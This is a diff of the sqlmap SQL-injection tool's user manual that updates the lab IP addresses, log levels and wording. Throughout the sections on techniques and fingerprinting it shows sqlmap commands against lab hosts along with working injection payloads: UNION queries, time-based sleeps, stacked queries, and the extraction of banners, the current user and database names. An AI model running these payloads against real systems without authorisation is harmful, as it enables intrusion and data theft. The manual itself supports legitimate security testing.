+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 2 \
   --dbms "PostgreSQL"
 
 [...]
@@ -1587,7 +1788,7 @@ back-end DBMS:    PostgreSQL
 
      
 
      
 
-
      In case you provide --fingerprint together with --dbms,
+
      In case you provide --fingerprint together with --dbms,
 sqlmap will only perform the extensive fingerprint for the specified
 database management system, read below for further details.
      
 
@@ -1599,10 +1800,10 @@ automatically identify it for you.
      
 
 
      Force the database management system operating system name
      
 
-
      Option: --os
      
+
      Option: --os
      
 
 
      By default sqlmap automatically detects the web application's back-end
-database manangement system underlying operating system when requested by
+database management system underlying operating system when requested by
 any other functionality.
 At the moment the fully supported operating systems are two:
      
 
      
@@ -1623,7 +1824,7 @@ not know it, let sqlmap automatically identify it for you.
      
 
 
      Custom injection payload
      
 
-
      Options: --prefix and --postfix
      
+
      Options: --prefix and --postfix
      
 
 
      In some circumstances the vulnerable parameter is exploitable only if the
 user provides a postfix to be appended to the injection payload.
@@ -1637,7 +1838,7 @@ postfix.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
   -p "id" --prefix "'" --postfix "AND 'test'='test"
 
 [...]
@@ -1647,11 +1848,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id
 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
 %28%27test%27=%27test HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
@@ -1692,7 +1893,7 @@ the real world application it is necessary to provide it.
      
 
 
      Page comparison
      
 
-
      Options: --string and --regexp
      
+
      Options: --string and --regexp
      
 
 
      By default the distinction of a True query by a False one (basic concept
 for Inferential blind SQL injection attacks) is done comparing injected
@@ -1720,15 +1921,15 @@ every second due to a call to PHP function time():
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
   -v 5
 
 [...]
 [hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
 [hh:mm:50] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Host: 172.16.213.131
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1749,8 +1950,8 @@ Content-Type: text/html
 
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Host: 172.16.213.131
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1771,8 +1972,8 @@ Content-Type: text/html
 
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+Host: 172.16.213.131
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1814,7 +2015,7 @@ every second due to a call to PHP function time():
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
   --string "luther" -v 1
 
 [hh:mm:22] [INFO] testing connection to the target url
@@ -1842,7 +2043,7 @@ every second due to a call to PHP function time():
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
   --regexp "<td>lu[\w][\w]er" -v 1
 
 [hh:mm:22] [INFO] testing connection to the target url
@@ -1867,16 +2068,16 @@ URL page content
 
      As you can see, when one of these options is specified, sqlmap skips the
 URL stability test.
      
 
-
      Consider one of these options a must when you are dealing with a page
-which content that changes itself at each refresh without modifying the
+
      Consider one of these options a MUST when dealing with a page
+with content that changes itself at each refresh without modifying the
 user's input.
      
 
 
 
      Exclude specific page content
      
 
-
      Options: --excl-str and --excl-reg
      
+
      Options: --excl-str and --excl-reg
      
 
-
      Another way to get around the dynamicity issue above explained is to exclude
+
      Another way to get around the dynamicity issue explained above is to exclude
 the dynamic part from the page content before processing it.
      
 
 
      As you see in the above example the number after Dynamic content: 
@@ -1887,7 +2088,7 @@ not injected page.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_refresh.php?id=1" \
   --excl-reg "Dynamic content: ([\d]+)"
 
 [hh:mm:22] [INFO] testing connection to the target url
@@ -1914,9 +2115,13 @@ stability test.
      
 
      5.5 Techniques
 
      
 
+
      These options can be used to test for specific SQL injection technique or
+to use one of them to exploit the affected parameter(s) rather than using
+the default blind SQL injection technique.
      
+
 
      Test for stacked queries (multiple statements) support
      
 
-
      Option: --stacked-test
      
+
      Option: --stacked-test
      
 
 
      It is possible to test if the web application technology supports
 stacked queries, multiple statements, on the injectable
@@ -1926,7 +2131,7 @@ parameter.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
   --stacked-test -v 1
 
 [...]
@@ -1950,7 +2155,7 @@ where PHP does not support them on MySQL, it does on PostgreSQL.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
   --stacked-test -v 1
 
 [...]
@@ -1967,7 +2172,7 @@ stacked queries support:    'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
   --stacked-test -v 1
 
 [...]
@@ -1983,7 +2188,7 @@ stacked queries support:    'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'=
 
 
      Test for time based blind SQL injection
      
 
-
      Options: --time-test and --time-sec
      
+
      Options: --time-test and --time-sec
      
 
 
      It is possible to test if the target URL is affected by a time based
 blind SQL injection vulnerability.
      
@@ -1992,7 +2197,7 @@ blind SQL injection vulnerability.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" \
   --time-test -v 1
 
 [...]
@@ -2011,7 +2216,7 @@ time based blind sql injection payload:    'id=1 AND SLEEP(5) AND 5249=5249'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
   --time-test -v 1
 
 [...]
@@ -2034,7 +2239,7 @@ time based blind sql injection payload:    'id=1; SELECT pg_sleep(5);-- AND 9644
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" \
   --time-test -v 1
 
 [...]
@@ -2055,13 +2260,13 @@ time based blind sql injection payload:    'name=luther'; WAITFOR DELAY '0:0:5';
 
      
 
 
      It is also possible to set the seconds to delay the response by providing
-the --time-sec option followed by an integer. By default it delays
-five seconds.
      
+the --time-sec option followed by an integer. By default delay
+is set to five seconds.
      
 
 
 
      Test for UNION query SQL injection
      
 
-
      Options: --union-test and --union-tech
      
+
      Options: --union-test and --union-tech
      
 
 
      It is possible to test if the target URL is affected by a UNION query
 (inband) SQL injection vulnerability.
@@ -2072,7 +2277,7 @@ technique.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
   --union-test -v 1
 
 [...]
@@ -2081,7 +2286,7 @@ back-end DBMS:  Oracle
 [hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
 technique
 [hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
+valid union:    'http://172.16.213.131/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
 NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
 
      
 
      
@@ -2090,7 +2295,7 @@ NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
 
      By default sqlmap uses the NULL bruteforcing technique to
 detect the number of columns within the original SELECT statement.
 It is also possible to change it to ORDER BY clause
-bruteforcing with the --union-tech option.
      
+bruteforcing       with the --union-tech option.
      
 
 
      Further details on these techniques can be found 
 here.
      
@@ -2099,7 +2304,7 @@ bruteforcing with the --union-tech option.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_str.php?id=1" \
   --union-test --union-tech orderby -v 1
 
 [...]
@@ -2108,7 +2313,7 @@ back-end DBMS: PostgreSQL
 [hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause 
 bruteforcing technique
 [hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
+valid union:    'http://172.16.213.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND 
 1262=1262'
 
      
 
      
@@ -2120,20 +2325,20 @@ In case a case it is strongly recommended to use this technique which saves
 a lot of time.
      
 
 
      It is strongly recommended to run at least once sqlmap with the
---union-test option to test if the affected parameter is used
+--union-test option to test if the affected parameter is used
 within a for cycle, or similar, and in case use
---union-use option to exploit this vulnerability because it
+--union-use option to exploit this vulnerability because it
 saves a lot of time and it does not weight down the web server log file
 with hundreds of HTTP requests.
      
 
 
 
      Use the UNION query SQL injection
      
 
-
      Option: --union-use
      
+
      Option: --union-use
      
 
-
      Providing the --union-use parameter, sqlmap will first test if
+
      Providing the --union-use parameter, sqlmap will first test if
 the target URL is affected by an inband SQL injection
-(--union-test) vulnerability then, in case it seems to be
+(--union-test) vulnerability then, in case it seems to be
 vulnerable, it will confirm that the parameter is affected by a Full
 UNION query SQL injection and use this technique to go ahead with the
 exploiting.
@@ -2148,7 +2353,7 @@ ahead.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 \
   --union-use --banner
 
 [...]
@@ -2161,10 +2366,10 @@ technique
 [hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection 
 vulnerability
-[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
+[hh:mm:42] [DEBUG] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
 CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
 CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [INFO] performed 3 queries in 0 seconds
+[hh:mm:42] [DEBUG] performed 3 queries in 0 seconds
 banner:
 ---
 Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
@@ -2184,13 +2389,13 @@ vulnerabilities.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 5 \
   --union-use --current-user
 
 [...]
 [hh:mm:29] [INFO] the target url is affected by an exploitable full inband sql 
 injection vulnerability
-[hh:mm:29] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
+[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(112,110,121,77,88,86),
 IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32)),CHAR(72,89,75,77,121,103)), 
 NULL# AND 8032=8032
 [hh:mm:29] [TRAFFIC OUT] HTTP request:
@@ -2199,11 +2404,11 @@ GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28C
 %29%2C%20CHAR%2832%29%29%2CCHAR%2872%2C89%2C75%2C77%2C121%2C103%29%29%2C%20NULL%23%20AND
 %208032=8032 HTTP/1.1
 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
-Host: 192.168.1.121:80
+Host: 172.16.213.131
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2223,7 +2428,7 @@ Content-Type: text/html
 </table>
 </body></html>
 
-[hh:mm:29] [INFO] performed 3 queries in 0 seconds
+[hh:mm:29] [DEBUG] performed 3 queries in 0 seconds
 current user:    'testuser@localhost'
 
      
 
      
@@ -2242,7 +2447,7 @@ entry is displayed in the page content.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_partialunion.php?id=1" -v 2 \
   --union-use --dbs
 
 [...]
@@ -2258,43 +2463,43 @@ injection vulnerability
 [hh:mm:56] [INFO] confirming partial inband sql injection on parameter 'id'
 [hh:mm:56] [INFO] the target url is affected by an exploitable partial inband sql injection 
 vulnerability
-[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
+[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),
 IFNULL(CAST(COUNT(schema_name) AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL 
 FROM information_schema.SCHEMATA# AND 1062=1062
-[hh:mm:56] [INFO] performed 6 queries in 0 seconds
+[hh:mm:56] [DEBUG] performed 6 queries in 0 seconds
 [hh:mm:56] [INFO] the SQL query provided returns 4 entries
-[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
 CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
 information_schema.SCHEMATA LIMIT 0, 1# AND 1421=1421
-[hh:mm:56] [INFO] performed 7 queries in 0 seconds
-[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+[hh:mm:56] [DEBUG] performed 7 queries in 0 seconds
+[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
 CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
 information_schema.SCHEMATA LIMIT 1, 1# AND 9553=9553
-[hh:mm:56] [INFO] performed 8 queries in 0 seconds
-[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+[hh:mm:56] [DEBUG] performed 8 queries in 0 seconds
+[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
 CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
 information_schema.SCHEMATA LIMIT 2, 1# AND 6805=6805
-[hh:mm:56] [INFO] performed 9 queries in 0 seconds
-[hh:mm:56] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
+[hh:mm:56] [DEBUG] performed 9 queries in 0 seconds
+[hh:mm:56] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(90,121,78,99,122,76),IFNULL(
 CAST(schema_name AS CHAR(10000)), CHAR(32)),CHAR(110,97,105,116,84,120)), NULL FROM 
 information_schema.SCHEMATA LIMIT 3, 1# AND 739=739
-[hh:mm:56] [INFO] performed 10 queries in 0 seconds
+[hh:mm:56] [DEBUG] performed 10 queries in 0 seconds
 available databases [4]:
 [*] information_schema
 [*] mysql
 [*] privatedb
-[*] test
+[*] testdb
 
      
 
      
 
      
 
 
      As you can see, sqlmap identified that the parameter is affected by a
-partial inband SQL injection, consequently counted the number of query
-output entries and retrieved once per time by forcing the parameter
+partial inband SQL injection. Consequently, it counted the number of query
+output entries and retrieved them once per time. It forces the parameter
 (id) value 1 to its negative value -1 so that
-it does not returns, presumibly, any output leaving our own UNION ALL
-SELECT statement to produce one entry at a time and display it in the
-page content.
      
+it does not return, presumibly, any output. That leaves our own UNION ALL
+SELECT statement to produce one entry at a time and display only it in 
+the page content.
      
 
 
 
      5.6 Fingerprint
@@ -2302,7 +2507,7 @@ page content.
      
 
 
      Extensive database management system fingerprint
      
 
-
      Options: -f or --fingerprint
      
+
      Options: -f or --fingerprint
      
 
 
      By default the web application's back-end database management system
 fingerprint is performed requesting a database specific function which
@@ -2319,14 +2524,12 @@ specific syntax within the limits of the database architecture.
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1
 
 [...]
 [hh:mm:17] [INFO] testing MySQL
 [hh:mm:17] [INFO] confirming MySQL
-[hh:mm:17] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
 [hh:mm:17] [INFO] retrieved: 5
-[hh:mm:17] [INFO] performed 13 queries in 0 seconds
 [hh:mm:17] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
@@ -2340,30 +2543,22 @@ system and the web application technology by parsing some HTTP response headers.
 
 
      If you want to perform an extensive database management system fingerprint
 based on various techniques like specific SQL dialects and inband error
-messages, you can  provide the --fingerprint option.
      
+messages, you can  provide the --fingerprint option.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 -f
 
 [...]
 [hh:mm:49] [INFO] testing MySQL
 [hh:mm:49] [INFO] confirming MySQL
-[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
 [hh:mm:49] [INFO] retrieved: 3
-[hh:mm:49] [INFO] performed 13 queries in 0 seconds
 [hh:mm:49] [INFO] the back-end DBMS is MySQL
-[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.PARAMETERS LIMIT 0, 1
 [hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] performed 6 queries in 0 seconds
-[hh:mm:49] [INFO] query: MID(@@table_open_cache, 1, 1)
 [hh:mm:49] [INFO] retrieved: 
-[hh:mm:49] [INFO] performed 6 queries in 0 seconds
-[hh:mm:49] [INFO] query: MID(@@hostname, 1, 1)
 [hh:mm:49] [INFO] retrieved: t
-[hh:mm:49] [INFO] performed 13 queries in 0 seconds
 [hh:mm:49] [INFO] executing MySQL comment injection fingerprint
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
@@ -2378,17 +2573,14 @@ back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" -v 1 -f
 
 [...]
 [hh:mm:38] [WARNING] the back-end DMBS is not MySQL
 [hh:mm:38] [INFO] testing Oracle
 [hh:mm:38] [INFO] confirming Oracle
 [hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION 
-WHERE ROWNUM=1
 [hh:mm:38] [INFO] retrieved: 10
-[hh:mm:38] [INFO] performed 20 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: active fingerprint: Oracle 10g
@@ -2401,19 +2593,15 @@ back-end DBMS: active fingerprint: Oracle 10g
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
 
 [...]
 [hh:mm:14] [WARNING] the back-end DMBS is not Oracle
 [hh:mm:14] [INFO] testing PostgreSQL
 [hh:mm:14] [INFO] confirming PostgreSQL
 [hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
-[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
 [hh:mm:14] [INFO] retrieved: 2
-[hh:mm:14] [INFO] performed 13 queries in 0 seconds
-[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
 [hh:mm:14] [INFO] retrieved: 
-[hh:mm:14] [INFO] performed 6 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
@@ -2422,15 +2610,15 @@ back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
 
      
 
      
 
-
      As you can see from this last example, sqlmap first tested for MySQL,
+
      As you can see from the last example, sqlmap first tested for MySQL,
 then for Oracle, then for PostgreSQL since the user did not forced the
-back-end database management system name with option --dbms.
      
+back-end database management system name with option --dbms.
      
 
 
      Example on a Microsoft SQL Server 2000 Service Pack 0 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 1 -f
 
 [...]
 [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
@@ -2449,7 +2637,7 @@ back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 1 -f
 
 [...]
 [hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
@@ -2465,33 +2653,33 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2005
 
      
 
 
      If you want an even more accurate result, based also on banner parsing,
-you can also provide the -b or --banner option.
      
+you can also provide the -b or --banner option.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 2 -f -b
 
 [...]
 [hh:mm:04] [INFO] testing MySQL
 [hh:mm:04] [INFO] confirming MySQL
-[hh:mm:04] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
+[hh:mm:04] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
 [hh:mm:04] [INFO] retrieved: 0
-[hh:mm:04] [INFO] performed 13 queries in 0 seconds
+[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
 [hh:mm:04] [INFO] the back-end DBMS is MySQL
-[hh:mm:04] [INFO] query: VERSION()
+[hh:mm:04] [DEBUG] query: VERSION()
 [hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
-[hh:mm:05] [INFO] performed 111 queries in 1 seconds
-[hh:mm:05] [INFO] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
+[hh:mm:05] [DEBUG] performed 111 queries in 1 seconds
+[hh:mm:05] [DEBUG] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
 [hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [INFO] performed 6 queries in 0 seconds
-[hh:mm:05] [INFO] query: MID(@@table_open_cache, 1, 1)
+[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
+[hh:mm:05] [DEBUG] query: MID(@@table_open_cache, 1, 1)
 [hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [INFO] performed 6 queries in 0 seconds
-[hh:mm:05] [INFO] query: MID(@@hostname, 1, 1)
+[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
+[hh:mm:05] [DEBUG] query: MID(@@hostname, 1, 1)
 [hh:mm:05] [INFO] retrieved: t
-[hh:mm:06] [INFO] performed 13 queries in 0 seconds
+[hh:mm:06] [DEBUG] performed 13 queries in 0 seconds
 [hh:mm:06] [INFO] executing MySQL comment injection fingerprint
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
@@ -2505,28 +2693,28 @@ back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
 
      
 
      
 
-
      As you can see, sqlmap was able to fingerprint also the back-end DBMS
+
      As you can see, sqlmap was also able to fingerprint the back-end DBMS
 operating system by parsing the DBMS banner value.
      
 
 
      Example on a Microsoft SQL Server 2000 Service Pack 0 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f -b
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/get_int.php?id=1" -v 2 -f -b
 
 [...]
 [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
 [hh:mm:03] [INFO] testing Microsoft SQL Server
 [hh:mm:03] [INFO] confirming Microsoft SQL Server
 [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [INFO] performed 13 queries in 0 seconds
-[hh:mm:03] [INFO] query: @@VERSION
+[hh:mm:03] [DEBUG] performed 13 queries in 0 seconds
+[hh:mm:03] [DEBUG] query: @@VERSION
 [hh:mm:03] [INFO] retrieved: Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
         Aug  6 2000 00:57:48 
         Copyright (c) 1988-2000 Microsoft Corporation
         Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
 
-[hh:mm:08] [INFO] performed 1308 queries in 4 seconds
+[hh:mm:08] [DEBUG] performed 1308 queries in 4 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
 web application technology: PHP 5.2.6, Apache 2.2.9
 back-end DBMS operating system: Windows 2000 Service Pack 4
@@ -2543,20 +2731,20 @@ back-end DBMS:  active fingerprint: Microsoft SQL Server 2000
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
+$ python sqlmap.py -u "http://172.16.213.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
 
 [...]
 [hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
 [hh:mm:03] [INFO] testing Microsoft SQL Server
 [hh:mm:03] [INFO] confirming Microsoft SQL Server
 [hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [INFO] query: @@VERSION
+[hh:mm:03] [DEBUG] query: @@VERSION
 [hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
         Oct 14 2005 00:33:37 
